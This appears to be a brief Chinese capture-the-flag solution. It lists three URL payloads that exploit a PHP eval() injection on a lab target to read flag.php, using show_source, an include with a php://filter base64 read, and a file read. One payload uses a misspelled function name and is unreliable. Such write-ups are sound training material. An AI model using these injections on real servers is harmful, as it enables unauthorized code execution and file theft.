方法一:eval存在命令执行漏洞,使用hello构造payload
http://120.24.86.145:8003/index.php?hello=1);show_source(%27flag.php%27);var_dump(3
方法二:
http://120.24.86.145:8003/index.php?hello=1);include $_POST['f'];//
在POST区域:f=php://filter/convert.base64-encode/resource=flag.php
Base64解码即可。
方法三:直接将flag.php文件读入变量hello中
?hello=get_file_contents('flag.php') ?hello=file('flag.php')
热门工具 换一换